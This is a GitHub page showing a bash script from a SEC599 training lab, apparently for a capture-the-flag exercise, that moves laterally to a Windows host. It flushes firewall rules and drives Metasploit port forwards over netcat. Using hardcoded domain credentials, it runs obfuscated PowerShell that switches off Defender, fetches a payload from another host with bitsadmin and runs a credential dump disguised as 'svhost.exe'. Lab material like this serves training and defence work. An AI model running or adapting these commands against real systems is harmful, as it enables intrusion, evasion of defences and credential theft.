forked from NVISOsecurity/SEC599
-
Notifications
You must be signed in to change notification settings - Fork 0
/
4-movetowin01-FINAL.sh
40 lines (31 loc) · 2.43 KB
/
4-movetowin01-FINAL.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/bin/bash
# SEC599 - DtF Script - Step 4 - Move laterally to Windows01
echo "Clearing firewall rules (allow all inbound)"
echo "-------------------------------------------"
iptables -F && echo "OK - iptables flushed"
iptables -I INPUT -j ACCEPT && echo "OK - all inbound allowed"
echo "Done"
while read c; do
ip=$(grep "^$c" /root/Desktop/CTF/output/3-metsessions_cms_backdoor_ip-final | awk -F ' ' '{print $2}')
echo ""
echo "Setting up portforward to Session $c - IP address $ip"
echo "-----------------------------------------------------"
cp /root/Desktop/CTF/4-portforwardtemplate /root/Desktop/CTF/4-portforward.rc
sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/4-portforward.rc
echo "resource /root/Desktop/CTF/4-portforward.rc" | nc 127.0.0.1 55554
echo "Use Dwight Schrute's credentials against Windows01 - Session $c - IP address $ip"
echo "--------------------------------------------------------------------------------"
# Disable Defender
/usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
# sleep 5
/usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\dwight.schrute\\Downloads\\svhost.exe'
/usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAZAB3AGkAZwBoAHQALgBzAGMAaAByAHUAdABlAFwAXABEAG8AdwBuAGwAbwBhAGQAcwBcAFwAcwB2AGgAbwBzAHQALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
# Enable Defender
/usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
echo "Done"
echo "Removing portforward to Session $c - IP address $ip"
echo "---------------------------------------------------"
cp /root/Desktop/CTF/4-stopportforwardtemplate /root/Desktop/CTF/4-stopportforward.rc
sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/4-stopportforward.rc
echo "resource /root/Desktop/CTF/4-stopportforward.rc" | nc 127.0.0.1 55554
done </root/Desktop/CTF/output/3-cms_backdoor_sessions_final